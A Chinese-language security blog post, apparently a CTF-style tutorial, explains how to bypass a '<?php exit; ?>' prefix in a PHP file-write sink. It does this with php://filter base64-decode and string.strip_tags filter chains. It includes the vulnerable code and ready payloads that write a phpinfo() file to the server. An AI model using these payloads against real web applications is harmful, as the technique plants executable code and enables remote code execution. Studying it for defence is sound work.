当前位置: 首页 > news >正文

RCE编码绕过--php://filter妙用

目录

代码

如何绕过

payload构造


代码

<?php
$content = '<?php exit; ?>';
$content .= $_POST['txt'];
file_put_contents($_POST['filename'],$content); 

当你想要输入代码的时候前面会有<?php exit;?>;,代码没有办法执行下去,所以我们要想办法绕过

如何绕过

我们可以尝试使用php://filter/write=convert.base64-decode/resource=abc.php,在写入文件的时候对文件进行解码,然后我们后面POST传参的时候可以传一个base64编码,然后php://file解码的时候会将前面的<?php exit;?>解码成别的字符,然后将你输入的base64编码解码成原来的字符

<?php phpinfo();的编码

PD9waHAgcGhwaW5mbygpOw==

抓包提交参数,所提交的txt前面需要加一个a,这个的原因是base是4位一解码,txt前面加a是用来给<?php exit; ?>补位的

payload构造

txt=aPD9waHAgcGhwaW5mbygpOw==
filename=php://filter/write=convert.base64-decode/resource=abc.php

看一下我们的文件路径,多出一个abc.php文件且前面的<?php exit; ?>被编码成乱码了,然后后面的php代码就可以执行了

php://filter还有别的标签string.strip_tags,这个标签可以从字符串中去除 HTML 和 PHP 标记。

然后我们可以传一个base64的编码然后先去除,<?php exit; ?>标签然后再解码,php://filter可以使用多个过滤器

如下,这里txt前面就没有了a

txt=PD9waHAgcGhwaW5mbygpOw==
filename=php://filter/write=string.strip_tags|convert.base64-decode/resource=abc.php

结果 


http://www.mrgr.cn/news/2696.html

相关文章:

  • Linux驱动开发基础(中断)
  • 【YOLO5 项目实战】(4)红外目标检测
  • [C++] map、set的 红黑树 封装(一)
  • python从入门到精通:数据容器
  • AI -- Machine Learning
  • Python基础:函数
  • 悬浮翻译软件下载哪一个?免费悬浮翻译工具评测
  • 第一批AI原住民开始变现:9岁小学生,用大模型写书赚1个w
  • 开发军用LabVIEW程序注意事项
  • 黑神话悟空对服务器有什么要求
  • 手写一个打印PDF方法,完美解决跨域问题
  • 【论文阅读】Retargeting and Respecializing GPU Workloads for Performance Portability
  • 详解华为项目管理,附华为高级项目管理内训材料
  • SwiftUI中 Swift Data 对象关联查询
  • 20240820模拟面试
  • LangGPT结构化提示词
  • Java学习框架
  • 深度学习Day-30:CGAN入门丨生成手势图像丨可控制生成
  • 文档翻译软件哪个好用?后悔没早发现这5款
  • Kubernetes中如何对etcd进行备份和还原